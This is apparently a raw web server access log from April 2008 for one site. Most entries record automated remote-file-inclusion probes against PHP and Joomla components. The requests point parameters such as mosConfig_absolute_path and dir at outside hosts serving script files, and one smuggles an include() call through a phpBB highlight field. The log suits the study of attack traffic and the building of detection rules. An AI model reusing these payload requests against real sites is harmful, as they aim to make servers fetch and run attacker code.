202.142.223.177 - - [07/Apr/2008:11:56:33 -0700] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:56:37 -0700] "GET /logs/access_080114.log/index.php?body=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:56:39 -0700] "GET /index.php?body=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:56:40 -0700] "GET /logs/index.php?body=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:11:56:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:56:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.80.42.159 - - [07/Apr/2008:11:56:58 -0700] "GET /logs/index.php?stranica=http://www.buyindianproducts.com/includes/font/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
200.80.42.159 - - [07/Apr/2008:11:56:59 -0700] "GET /index.php?stranica=http://www.buyindianproducts.com/includes/font/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
89.218.85.18 - - [07/Apr/2008:11:57:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:57:30 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:57:30 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:57:33 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:57:33 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:57:34 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:57:34 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.37 - - [07/Apr/2008:11:57:38 -0700] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:11:57:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:11:57:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:11:57:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:58:02 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:58:02 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:58:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:58:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:58:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:58:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:58:03 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:11:58:03 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:11:58:06 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:11:58:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:11:58:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:11:58:08 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:11:58:08 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:11:58:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:11:58:08 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:11:58:11 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:58:39 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:59:26 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:59:27 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:59:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:59:27 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:59:35 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:12:00:14 -0700] "GET /logs/access_080127.log/%030/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:12:00:16 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:12:00:16 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:12:00:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:12:00:16 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:12:00:22 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://66.153.86.221/www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:12:00:23 -0700] "GET /davep/BigBear308/DSCF0484.AVI HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:00:24 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:00:24 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:00:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:00:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:00:25 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:00:25 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:00:25 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:00:25 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.70.35.179 - - [07/Apr/2008:12:00:27 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:12:00:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:01:36 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:12:01:44 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:12:01:44 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:12:01:49 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:12:01:49 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:12:02:01 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [07/Apr/2008:12:02:05 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [07/Apr/2008:12:02:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [07/Apr/2008:12:02:07 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:02:15 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:02:16 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:02:16 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:02:16 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:02:16 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:02:17 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:12:02:38 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:12:02:39 -0700] "GET //config/dbutil.bck.php?confdir=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:12:02:39 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.90 - - [07/Apr/2008:12:02:52 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.230 - - [07/Apr/2008:12:02:53 -0700] "GET /logs/access_080205.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:02:59 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:01 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:02 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:02 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:03 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:04 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:05 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:05 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:06 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:21 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:21 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:21 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:03:24 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:28 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:28 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:03:28 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:12:03:29 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:12:03:29 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:12:03:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:12:03:30 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:03:35 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.98.178 - - [07/Apr/2008:12:04:08 -0700] "GET /logs/access_080308.log//init_basic.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.98.178 - - [07/Apr/2008:12:04:08 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.98.178 - - [07/Apr/2008:12:04:09 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:04:47 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:04:51 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:12:05:33 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:12:05:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:12:05:34 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:12:05:35 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.105 - - [07/Apr/2008:12:06:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:06:37 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:06:38 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:06:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:06:39 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:06:51 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:06:51 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.6.18.59 - - [07/Apr/2008:12:07:05 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 6414 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
200.48.204.130 - - [07/Apr/2008:12:07:27 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:12:07:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.76" "www.dmulk.com"
